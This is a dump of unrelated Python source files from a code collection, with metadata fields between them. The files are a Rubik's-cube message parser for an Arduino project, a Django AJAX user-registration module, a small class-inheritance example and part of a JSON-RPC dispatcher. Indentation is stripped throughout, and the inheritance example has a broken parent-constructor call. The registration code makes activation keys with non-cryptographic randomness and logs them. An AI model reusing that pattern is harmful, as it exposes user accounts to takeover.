Cette fonction va nous permettre de simplifier la réception du message Arduino
avant de le transmettre à l'afficheur
Cette fonction ne sera pas expliquée en détail, car c'est simplement une modification longue et sinueuse
du message Arduino ayant pour objectif principal d'enlever les imperfections pour créer quelques choses
de facile à comprendre pour l'utilisateur
'''
def optimisation(liste):
def simplification(txt):
txt = (txt.replace("['", "")).replace("\\n]", "")
txt = txt.replace('"', "")
txt = (txt.replace(',,', ",")).replace("\\r\\n'", '\n')
txt = txt.replace(", '\n,", "\n€")
txt = txt.replace("\n, '", "\n")
txt = (txt.replace(', \\r', '')).replace(', ', '')
txt = txt.replace("'\\r", '')
txt = txt.replace('\\r', '')
txt = ((txt.replace("€'", "")).replace("€ '", "")).replace("€ ", "")
txt = txt.replace('\\n', '\n')
txt = txt[:-1]
txt = txt.replace('Transfert terminé ...\n', '')
return txt
def Convert(alpha):
li = list(alpha.split(" "))
return li
txt = str(liste)
txt2 = Convert(txt)
txt3, txt4 = [], []
for s_list in txt2:
q = (((str(s_list).replace('[', '')).replace(']', '')).replace('(', '')).replace(')', '')
if len(q) > 10:
q = "Solving"
q = re.sub('Face:|Fix|Cross|Instance|1:|2:|3:|Corners|bring|yellow|piece|up:|Done|\'Transfert|finish|'
'Add|Edges|edges|White|Top:|Finish|Face|Green|Right:|Left:|Solving|Cube:|Superflip'
'Cross:|Solved|PLL:|inside|First|Layer|not|Second|Whole|:|last|OLL|The|is', '', q)
if len(q) > 0:
txt3.append(q)
# " CW Rotation: "
# " CCW Rotation: "
mx = len(txt3)
for i in range(0, mx):
if txt3[i] == "B,":
txt3[i] = 'B,'
if len(txt3[i]) == 4 and txt3[i][1] == "B":
txt3[i] = "B'"
if txt3[i] == 'Flip':
if txt3[i + 1] == 'CCW':
# "[Cube Flip: CCW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on F'
# "[Cube Flip: CCW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on U'
elif txt3[i + 1] == 'CW':
# "[Cube Flip: CW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on F'
# "[Cube Flip: CW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on U'
elif (txt3[i] == 'CW' or txt3[i] == 'CCW') and txt3[i + 1] == 'Rotation':
txt3[i] = ''
txt3[i + 1] = ''
for s_list in txt3:
s_list = s_list.replace(',', '')
if len(str(s_list)) > 0 and str(s_list)[0] in 'BCDLURF':
txt4.append(s_list)
del txt4[-1]
return txt4
| <filename>Code python/Pycharm/texte_optimisation.py
import re
'''
Cette fonction va nous permettre de simplifier la réception du message Arduino
avant de le transmettre à l'afficheur
Cette fonction ne sera pas expliquée en détail, car c'est simplement une modification longue et sinueuse
du message Arduino ayant pour objectif principal d'enlever les imperfections pour créer quelques choses
de facile à comprendre pour l'utilisateur
'''
def optimisation(liste):
def simplification(txt):
txt = (txt.replace("['", "")).replace("\\n]", "")
txt = txt.replace('"', "")
txt = (txt.replace(',,', ",")).replace("\\r\\n'", '\n')
txt = txt.replace(", '\n,", "\n€")
txt = txt.replace("\n, '", "\n")
txt = (txt.replace(', \\r', '')).replace(', ', '')
txt = txt.replace("'\\r", '')
txt = txt.replace('\\r', '')
txt = ((txt.replace("€'", "")).replace("€ '", "")).replace("€ ", "")
txt = txt.replace('\\n', '\n')
txt = txt[:-1]
txt = txt.replace('Transfert terminé ...\n', '')
return txt
def Convert(alpha):
li = list(alpha.split(" "))
return li
txt = str(liste)
txt2 = Convert(txt)
txt3, txt4 = [], []
for s_list in txt2:
q = (((str(s_list).replace('[', '')).replace(']', '')).replace('(', '')).replace(')', '')
if len(q) > 10:
q = "Solving"
q = re.sub('Face:|Fix|Cross|Instance|1:|2:|3:|Corners|bring|yellow|piece|up:|Done|\'Transfert|finish|'
'Add|Edges|edges|White|Top:|Finish|Face|Green|Right:|Left:|Solving|Cube:|Superflip'
'Cross:|Solved|PLL:|inside|First|Layer|not|Second|Whole|:|last|OLL|The|is', '', q)
if len(q) > 0:
txt3.append(q)
# " CW Rotation: "
# " CCW Rotation: "
mx = len(txt3)
for i in range(0, mx):
if txt3[i] == "B,":
txt3[i] = 'B,'
if len(txt3[i]) == 4 and txt3[i][1] == "B":
txt3[i] = "B'"
if txt3[i] == 'Flip':
if txt3[i + 1] == 'CCW':
# "[Cube Flip: CCW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on F'
# "[Cube Flip: CCW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on U'
elif txt3[i + 1] == 'CW':
# "[Cube Flip: CW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on F'
# "[Cube Flip: CW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on U'
elif (txt3[i] == 'CW' or txt3[i] == 'CCW') and txt3[i + 1] == 'Rotation':
txt3[i] = ''
txt3[i + 1] = ''
for s_list in txt3:
s_list = s_list.replace(',', '')
if len(str(s_list)) > 0 and str(s_list)[0] in 'BCDLURF':
txt4.append(s_list)
del txt4[-1]
return txt4
| fr | 0.963574 | Cette fonction va nous permettre de simplifier la réception du message Arduino
avant de le transmettre à l'afficheur
Cette fonction ne sera pas expliquée en détail, car c'est simplement une modification longue et sinueuse
du message Arduino ayant pour objectif principal d'enlever les imperfections pour créer quelques choses
de facile à comprendre pour l'utilisateur # " CW Rotation: " # " CCW Rotation: " # "[Cube Flip: CCW on F]" # "[Cube Flip: CCW on U]" # "[Cube Flip: CW on F]" # "[Cube Flip: CW on U]" | 3.092973 | 3 |
grid_user/ajax.py | topd333/Xlab | 0 | 6632541 | from django.http import HttpResponse, HttpResponseRedirect
import json
from django.core.mail import send_mail
from django.core.exceptions import ObjectDoesNotExist
from string import letters, digits
import random
from random import choice
from django.conf import settings
from grid_user.forms import CreateUserForm
import xlab.settings
from models import TempUser, User
from slipstream.user.account import UserAccount
import logging
from django.shortcuts import render
log = logging.getLogger("[GRID_USER]: ")
def ajax_checkusername(request):
datadict = {}
username = request.POST.get('username', '')
user = User.objects.filter(username=username)
tempuser = TempUser.objects.filter(username=username)
if user or tempuser:
datadict['available'] = False
datadict['username'] = username
else:
datadict['available'] = True
datadict['username'] = username
return HttpResponse(json.dumps(datadict), content_type="text/json")
def ajax_register_user(request):
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
form = CreateUserForm(request.POST)
if form.is_valid():
data = request.POST
email = data['email']
firstname = data['firstname']
lastname = data['lastname']
password = data['password']
username = data['username']
key = ''.join(choice(letters + digits) for i in range(64))
log.info('Key Created: %s' % key)
# Test for existing email / avatar name locally
test = ''
xtest = ''
try:
test = User.objects.get(firstname=firstname, lastname=lastname)
xtest += "Firstname and Lastname exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(email=email)
xtest += " Email exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(username=username)
xtest += " Username exists"
except ObjectDoesNotExist:
pass
x_user = UserAccount(
data['firstname'],
data['lastname'],
data['password'],
data['email'],
)
activation_server = settings.ACCOUNT_SERVER_ADDRESS
account_server = settings.ACCOUNT_SERVER_URL
from_address = settings.ACCOUNT_ADMIN_EMAIL
# Test for existing user on grid
if not x_user.test_account(account_server) or xtest != '':
#if xtest != '':
datadict = {'status': False}
datadict['err_message'] = 'Existing Account Of Same %s: Please register with different credentials'%xtest
return HttpResponse(json.dumps(datadict), content_type="text/json")
# Attempt to create a temporary user
# try:
# tmp_user = TempUser.objects.create_temp_user(
# data['email'], data['firstname'], data['lastname'],
# key, data['password']
# )
tmp_user =""
try:
tmp_user = form.save(commit=False)
tmp_user.activation_key = key
tmp_user.save()
except:
datadict = {'status': False}
datadict['err_message'] = 'Existing Account: Please register with different credentials'
return HttpResponse(json.dumps(datadict), content_type="text/json")
# activate_link = '%s:%s'%(request.META['SERVER_NAME'], request.META['SERVER_PORT'])
send_mail('Account activation link', 'Please use the link to activate your account: %s/activate?key=%s' %
(activation_server, key), from_address, [email])
datadict = {'status': True}
datadict['firstname'] = firstname
datadict['lastname'] = lastname
datadict['email'] = email
datadict['id'] = tmp_user.id
return HttpResponse(json.dumps(datadict), content_type="text/json")
else:
datadict = {'status': False, 'error': form.errors}
return HttpResponse(
content=json.dumps(datadict),
mimetype='application/json'
)
def ajax_accounttype_user(request):
if request.method == 'POST':
lastrid = request.POST['user_id']
user = TempUser.objects.get(id=lastrid)
user.accounttype = "basic membership"
user.save()
return HttpResponse(content_type="text/json", status=200)
def ajax_checkpassword(request):
datadict = {}
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
currentpass = request.POST.get('password', None)
try:
check = request.user.check_password(currentpass)
except:
check = False
if check:
datadict['status'] = True
else:
datadict['status'] = False
return HttpResponse(json.dumps(datadict), content_type="text/json") | from django.http import HttpResponse, HttpResponseRedirect
import json
from django.core.mail import send_mail
from django.core.exceptions import ObjectDoesNotExist
from string import letters, digits
import random
from random import choice
from django.conf import settings
from grid_user.forms import CreateUserForm
import xlab.settings
from models import TempUser, User
from slipstream.user.account import UserAccount
import logging
from django.shortcuts import render
log = logging.getLogger("[GRID_USER]: ")
def ajax_checkusername(request):
datadict = {}
username = request.POST.get('username', '')
user = User.objects.filter(username=username)
tempuser = TempUser.objects.filter(username=username)
if user or tempuser:
datadict['available'] = False
datadict['username'] = username
else:
datadict['available'] = True
datadict['username'] = username
return HttpResponse(json.dumps(datadict), content_type="text/json")
def ajax_register_user(request):
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
form = CreateUserForm(request.POST)
if form.is_valid():
data = request.POST
email = data['email']
firstname = data['firstname']
lastname = data['lastname']
password = data['password']
username = data['username']
key = ''.join(choice(letters + digits) for i in range(64))
log.info('Key Created: %s' % key)
# Test for existing email / avatar name locally
test = ''
xtest = ''
try:
test = User.objects.get(firstname=firstname, lastname=lastname)
xtest += "Firstname and Lastname exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(email=email)
xtest += " Email exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(username=username)
xtest += " Username exists"
except ObjectDoesNotExist:
pass
x_user = UserAccount(
data['firstname'],
data['lastname'],
data['password'],
data['email'],
)
activation_server = settings.ACCOUNT_SERVER_ADDRESS
account_server = settings.ACCOUNT_SERVER_URL
from_address = settings.ACCOUNT_ADMIN_EMAIL
# Test for existing user on grid
if not x_user.test_account(account_server) or xtest != '':
#if xtest != '':
datadict = {'status': False}
datadict['err_message'] = 'Existing Account Of Same %s: Please register with different credentials'%xtest
return HttpResponse(json.dumps(datadict), content_type="text/json")
# Attempt to create a temporary user
# try:
# tmp_user = TempUser.objects.create_temp_user(
# data['email'], data['firstname'], data['lastname'],
# key, data['password']
# )
tmp_user =""
try:
tmp_user = form.save(commit=False)
tmp_user.activation_key = key
tmp_user.save()
except:
datadict = {'status': False}
datadict['err_message'] = 'Existing Account: Please register with different credentials'
return HttpResponse(json.dumps(datadict), content_type="text/json")
# activate_link = '%s:%s'%(request.META['SERVER_NAME'], request.META['SERVER_PORT'])
send_mail('Account activation link', 'Please use the link to activate your account: %s/activate?key=%s' %
(activation_server, key), from_address, [email])
datadict = {'status': True}
datadict['firstname'] = firstname
datadict['lastname'] = lastname
datadict['email'] = email
datadict['id'] = tmp_user.id
return HttpResponse(json.dumps(datadict), content_type="text/json")
else:
datadict = {'status': False, 'error': form.errors}
return HttpResponse(
content=json.dumps(datadict),
mimetype='application/json'
)
def ajax_accounttype_user(request):
if request.method == 'POST':
lastrid = request.POST['user_id']
user = TempUser.objects.get(id=lastrid)
user.accounttype = "basic membership"
user.save()
return HttpResponse(content_type="text/json", status=200)
def ajax_checkpassword(request):
datadict = {}
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
currentpass = request.POST.get('password', None)
try:
check = request.user.check_password(currentpass)
except:
check = False
if check:
datadict['status'] = True
else:
datadict['status'] = False
return HttpResponse(json.dumps(datadict), content_type="text/json") | en | 0.403739 | # Test for existing email / avatar name locally # Test for existing user on grid #if xtest != '': # Attempt to create a temporary user # try: # tmp_user = TempUser.objects.create_temp_user( # data['email'], data['firstname'], data['lastname'], # key, data['password'] # ) # activate_link = '%s:%s'%(request.META['SERVER_NAME'], request.META['SERVER_PORT']) | 2.11582 | 2 |
OOP/Dog.py | zxg110/PythonGrammer | 0 | 6632542 | <reponame>zxg110/PythonGrammer
from OOP import Animal
class Dog(Animal.Animal):
def __init__(self, name, level, age):
#调用父类的构造函数写法
Animal.__init__(name,level)
self.age = age
dog = Dog('tom',1,23)
print("Dog age:",dog.age,"Dog name:",dog.name)
print(type(dog))
| from OOP import Animal
class Dog(Animal.Animal):
def __init__(self, name, level, age):
#调用父类的构造函数写法
Animal.__init__(name,level)
self.age = age
dog = Dog('tom',1,23)
print("Dog age:",dog.age,"Dog name:",dog.name)
print(type(dog)) | zh | 0.774019 | #调用父类的构造函数写法 | 3.897112 | 4 |
xjsonrpc/server/dispatcher.py | bernhardkaindl/pjrpc | 0 | 6632543 | <filename>xjsonrpc/server/dispatcher.py<gh_stars>0
import asyncio
import functools as ft
import json
import itertools as it
import logging
from typing import Any, Callable, Dict, ItemsView, KeysView, List, Optional, Type, Iterator, Iterable, Union, ValuesView
from typing import cast, TypeVar
import xjsonrpc
from xjsonrpc.common import v20, BatchRequest, BatchResponse, Request, Response, UNSET, UnsetType
from xjsonrpc.server import utils
from . import validators
logger = logging.getLogger(__package__)
default_validator = validators.base.BaseValidator()
lst = List[Any]
dct = Dict[Any, Any]
RpcMethod = Callable[..., Any]
RpcParams = Optional[Union[lst, dct]]
Context = Optional[Any]
class Method:
"""
    JSON-RPC method wrapper. Stores the method itself and some meta-information.
:param method: method
:param name: method name
:param context: context name
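
    Example (an illustrative sketch; ``ping`` is an assumed user function, not
    part of this module)::

        def ping(echo: str) -> str:
            return echo

        method = Method(ping, name='app.ping')
        bound = method.bind(params={'echo': 'hello'})
        bound()  # -> 'hello'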
"""
def __init__(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
):
self.method = method
self.name = name or method.__name__
self.context = context
meta = utils.set_meta(method, method_name=self.name, context_name=context)
self.validator, self.validator_args = meta.get('validator', default_validator), meta.get('validator_args', {})
def bind(self, params: RpcParams, context: Context = None,) -> RpcMethod:
method_params = self.validator.validate_method(
self.method, params, exclude=(self.context,) if self.context else (), **self.validator_args
)
if self.context is not None:
method_params[self.context] = context
return ft.partial(self.method, **method_params)
def copy(self, **kwargs: Any) -> "Method":
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return Method(method=self.method, **cls_kwargs)
def __eq__(self, other: Any) -> bool:
# sourcery skip: assign-if-exp, reintroduce-else, swap-if-expression
if not isinstance(other, Method):
return False
return (self.method, self.name, self.context) == (other.method, other.name, other.context)
class ViewMethod(Method):
"""
View method.
    :param view_cls: view class
    :param method_name: view class method name
    :param name: exposed method name (defaults to the view method name)
    :param context: context name
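
    Example (an illustrative sketch; ``UsersView`` is an assumed view class)::

        method = ViewMethod(UsersView, 'get', name='users.get')
        bound = method.bind(params={'user_id': 1})  # instantiates the view and binds ``get``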
"""
def __init__(
self,
view_cls: Type['ViewMixin'],
method_name: str,
name: Optional[str] = None,
context: Optional[Any] = None,
):
super().__init__(getattr(view_cls, method_name), name or method_name, context)
self.view_cls = view_cls
self.method_name = method_name
def bind(self, params: RpcParams, context: Optional[Any] = None) -> RpcMethod:
view = self.view_cls(context) if self.context else self.view_cls() # type: ignore
method = getattr(view, self.method_name)
method_params = self.validator.validate_method(method, params, **self.validator_args)
return ft.partial(method, **method_params)
def copy(self, **kwargs: Any) -> 'ViewMethod':
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return ViewMethod(view_cls=self.view_cls, method_name=self.method_name, **cls_kwargs)
class ViewMixin:
"""
    Simple class-based method handler mixin. Exposes all public methods.
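
    Example (an illustrative sketch)::

        class UsersView(ViewMixin):

            def get(self, user_id: int) -> dict:
                return {'id': user_id}

            def _helper(self):  # not exposed: name starts with an underscore
                ...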
"""
@classmethod
def __methods__(cls) -> Any:
for attr_name in filter(lambda name: not name.startswith('_'), dir(cls)):
attr = getattr(cls, attr_name)
if callable(attr):
yield attr
class MethodRegistry:
"""
Method registry.
:param prefix: method name prefix to be used for naming containing methods
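
    Example (an illustrative sketch; the ``subtract`` method is an assumption)::

        registry = MethodRegistry(prefix='math')

        @registry.add
        def subtract(a: int, b: int) -> int:
            return a - b

        registry['math.subtract']  # -> Method wrapping ``subtract``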
"""
def __init__(self, prefix: Optional[str] = None):
self._prefix = prefix
self._registry: Dict[str, Method] = {}
def __iter__(self) -> Iterator[str]:
"""
Returns registry method iterator.
"""
return iter(self._registry)
def __getitem__(self, item: str) -> Method:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method
:raises: KeyError
"""
return self._registry[item]
def items(self) -> ItemsView[str, Method]:
return self._registry.items()
def keys(self) -> KeysView[str]:
return self._registry.keys()
def values(self) -> ValuesView[Method]:
return self._registry.values()
def get(self, item: str) -> Optional[Method]:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method or `None`
"""
return self._registry.get(item)
def add(
self,
rpc_method: RpcMethod,
name: Optional[str] = None,
context: Context = None,
) -> RpcMethod:
"""
        Registers a method in the registry; can be called directly or used as a plain decorator.
        :param rpc_method: method
        :param name: method name to be used instead of `__name__` attribute
        :param context: parameter name to be used as an application context
        :returns: the registered method itself
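
        Example (illustrative; assumes ``registry`` is a :py:class:`MethodRegistry` instance)::

            @registry.add
            def ping() -> str:
                return 'pong'

            registry.add(ping, name='ping_alias')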
"""
# https://stackoverflow.com/questions/65588913/mypy-type-annotations-for-a-decorator
t = TypeVar("t", bound=Callable[..., Any])
def decorator(method: t) -> t:
full_name = ".".join(filter(None, (self._prefix, name or method.__name__)))
self.add_methods(Method(method, full_name, context))
return method
return decorator(rpc_method)
def add_methods(self, *methods: Union[RpcMethod, Method]) -> None:
"""
Adds methods to the registry.
:param methods: methods to be added. Each one can be an instance of :py:class:`xjsonrpc.server.Method`
or plain method
"""
for method in methods:
if isinstance(method, Method):
self._add_method(method)
else:
self.add(method)
def view(
self, maybe_view: Optional[Type[ViewMixin]] = None, context: Optional[Any] = None, prefix: Optional[str] = None,
    ) -> Union[Type[ViewMixin], Callable[..., Any]]:
"""
Methods view decorator.
        :param maybe_view: view class or `None`
:param context: application context name
:param prefix: view methods prefix
:return: decorator or decorated view
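
        Example (illustrative; ``UsersView`` is an assumed :py:class:`ViewMixin` subclass)::

            @registry.view(prefix='users')
            class UsersView(ViewMixin):

                def get(self, user_id: int) -> dict:
                    return {'id': user_id}

            # exposes the method as 'users.get' (assuming the registry itself has no prefix)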
"""
def decorator(view: Type[ViewMixin]) -> Type[ViewMixin]:
for method in view.__methods__():
full_name = '.'.join(filter(None, (self._prefix, prefix, method.__name__)))
self._add_method(ViewMethod(view, method.__name__, full_name, context))
return view
# maybe_view's type depends on the usage of the decorator. It's a View
# if it's used as `@view` but ``None`` if used as `@view()`.
if maybe_view is None:
return decorator
else:
return decorator(maybe_view)
def merge(self, other: 'MethodRegistry') -> None:
"""
Merges two registries.
        :param other: registry to be merged into the current one
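
        Example (illustrative; ``math_registry`` is an assumed registry)::

            api = MethodRegistry(prefix='v1')
            api.merge(math_registry)  # e.g. 'math.subtract' becomes 'v1.math.subtract'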
"""
for name, method in other.items():
if self._prefix:
name = f'{self._prefix}.{name}'
self._add_method(method.copy(name=name))
def _add_method(self, method: Method) -> None:
if method.name in self._registry:
logger.warning(f"method '{method.name}' already registered")
self._registry[method.name] = method
class JSONEncoder(xjsonrpc.JSONEncoder):
"""
    Server JSON encoder. All custom server encoders should inherit from it.
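
    Example (an illustrative sketch of a custom encoder)::

        import uuid

        class MyJSONEncoder(JSONEncoder):

            def default(self, o):
                if isinstance(o, uuid.UUID):
                    return str(o)
                return super().default(o)

        # pass it to a dispatcher via ``json_encoder=MyJSONEncoder``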
"""
def default(self, o: Any) -> Any:
if isinstance(o, validators.base.ValidationError):
return list(o.args)
return super().default(o)
class BaseDispatcher:
"""
Method dispatcher.
:param request_class: JSON-RPC request class
:param response_class: JSON-RPC response class
:param batch_request: JSON-RPC batch request class
:param batch_response: JSON-RPC batch response class
:param json_loader: request json loader
:param json_dumper: response json dumper
:param json_encoder: response json encoder
:param json_decoder: request json decoder
:param middlewares: request middlewares
:param error_handlers: request error handlers
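
    Example (an illustrative sketch of the middleware and error handler hooks;
    the handler bodies are assumptions)::

        def logging_middleware(request, context, handler):
            # ``handler`` is the next callable in the chain
            return handler(request, context)

        def on_error(request, context, error):
            return error  # may return a transformed error

        dispatcher = Dispatcher(
            middlewares=[logging_middleware],
            error_handlers={None: [on_error]},
        )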
"""
def __init__(
self,
*,
request_class: Type[Request] = v20.Request,
response_class: Type[Response] = v20.Response,
batch_request: Type[BatchRequest] = v20.BatchRequest,
batch_response: Type[BatchResponse] = v20.BatchResponse,
json_loader: Callable[..., Any] = json.loads,
json_dumper: Callable[..., str] = json.dumps,
json_encoder: Type[JSONEncoder] = JSONEncoder,
json_decoder: Optional[Type[json.JSONDecoder]] = None,
middlewares: Iterable[Callable[..., Any]] = (),
error_handlers: Dict[Union[None, int, Exception], List[Callable[..., Any]]] = {},
):
self._json_loader = json_loader
self._json_dumper = json_dumper
self._json_encoder = json_encoder
self._json_decoder = json_decoder
self._request_class = request_class
self._response_class = response_class
self._batch_request = batch_request
self._batch_response = batch_response
self._middlewares = list(middlewares)
self._error_handlers = error_handlers
self._registry = MethodRegistry()
@property
def registry(self) -> MethodRegistry:
return self._registry
def add(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
) -> None:
"""
Adds method to the registry.
:param method: method
:param name: method name
:param context: application context name
"""
self._registry.add(method, name, context)
def add_methods(self, *methods: Union[MethodRegistry, Method, RpcMethod]) -> None:
"""
Adds methods to the registry.
:param methods: method list. Each method may be an instance of :py:class:`xjsonrpc.server.MethodRegistry`,
:py:class:`xjsonrpc.server.Method` or plain function
"""
for method in methods:
if isinstance(method, MethodRegistry):
self._registry.merge(method)
elif isinstance(method, Method):
self._registry.add_methods(method)
else:
self._registry.add(method)
def view(self, view: Type[ViewMixin]) -> None:
"""
Adds class based view to the registry.
:param view: view to be added
"""
self._registry.view(view)
class Dispatcher(BaseDispatcher):
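    """
    Synchronous method dispatcher.
    """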
def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
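
        Example (illustrative; ``ping`` is an assumed registered method)::

            dispatcher = Dispatcher()
            dispatcher.add(ping, name='ping')
            response_text = dispatcher.dispatch(
                '{"jsonrpc": "2.0", "id": 1, "method": "ping"}'
            )  # -> serialized JSON-RPC response text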
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*cast(
BatchResponse,
filter(
lambda resp: resp is not UNSET, (
self._handle_request(request, context)
for request in batch_request
)
)
)
)
else:
request = self._request_class.from_json(request_json)
response = self._handle_request(request, context)
except json.JSONDecodeError as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.ParseError(data=str(e)))
except (xjsonrpc.exceptions.DeserializationError, xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
def _handle_rpc_method(
self, method_name: str, params: Optional[Union[lst, dct]], context: Optional[Any]
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
return bound()
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
class AsyncDispatcher(BaseDispatcher):
"""
Asynchronous method dispatcher.
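
    Example (an illustrative sketch; ``fetch_user`` is an assumed coroutine)::

        async def fetch_user(user_id: int) -> dict:
            return {'id': user_id}

        dispatcher = AsyncDispatcher()
        dispatcher.add(fetch_user)

        # inside a coroutine:
        #     response_text = await dispatcher.dispatch(request_text)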
"""
async def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*filter(
lambda resp: resp is not UNSET, await asyncio.gather(
*(self._handle_request(request, context)
for request in batch_request)
),
)
)
else:
request = self._request_class.from_json(request_json)
response = await self._handle_request(request, context)
if not response or isinstance(response, UnsetType):
return None
except json.JSONDecodeError as e:
response = self._response_class(
id=None, error=xjsonrpc.exceptions.ParseError(data=str(e))
)
except (xjsonrpc.exceptions.DeserializationError,
xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
async def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return await handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = await handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
async def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = await self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
async def _handle_rpc_method(
self, method_name: str, params: RpcParams, context: Optional[Any],
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
result = bound()
if asyncio.iscoroutine(result):
result = await result
return result
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
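# A minimal, hypothetical usage sketch (not asserted by the original sources):
# register one coroutine method on an AsyncDispatcher and feed dispatch() a raw
# JSON-RPC 2.0 request string. The method name "ping" and the request id are
# illustration values only; exact request parsing is handled by the v20 classes.
async def _example_async_dispatch() -> Optional[str]:
    dispatcher = AsyncDispatcher()
    async def ping() -> str:
        return "pong"
    dispatcher.add(ping)  # registered under its function name, "ping"
    request_text = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "ping"})
    # dispatch() returns the serialized response text, or None for a notification
    return await dispatcher.dispatch(request_text)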
| <filename>xjsonrpc/server/dispatcher.py<gh_stars>0
import asyncio
import functools as ft
import json
import itertools as it
import logging
from typing import Any, Callable, Dict, ItemsView, KeysView, List, Optional, Type, Iterator, Iterable, Union, ValuesView
from typing import cast, TypeVar
import xjsonrpc
from xjsonrpc.common import v20, BatchRequest, BatchResponse, Request, Response, UNSET, UnsetType
from xjsonrpc.server import utils
from . import validators
logger = logging.getLogger(__package__)
default_validator = validators.base.BaseValidator()
lst = List[Any]
dct = Dict[Any, Any]
RpcMethod = Callable[..., Any]
RpcParams = Optional[Union[lst, dct]]
Context = Optional[Any]
class Method:
"""
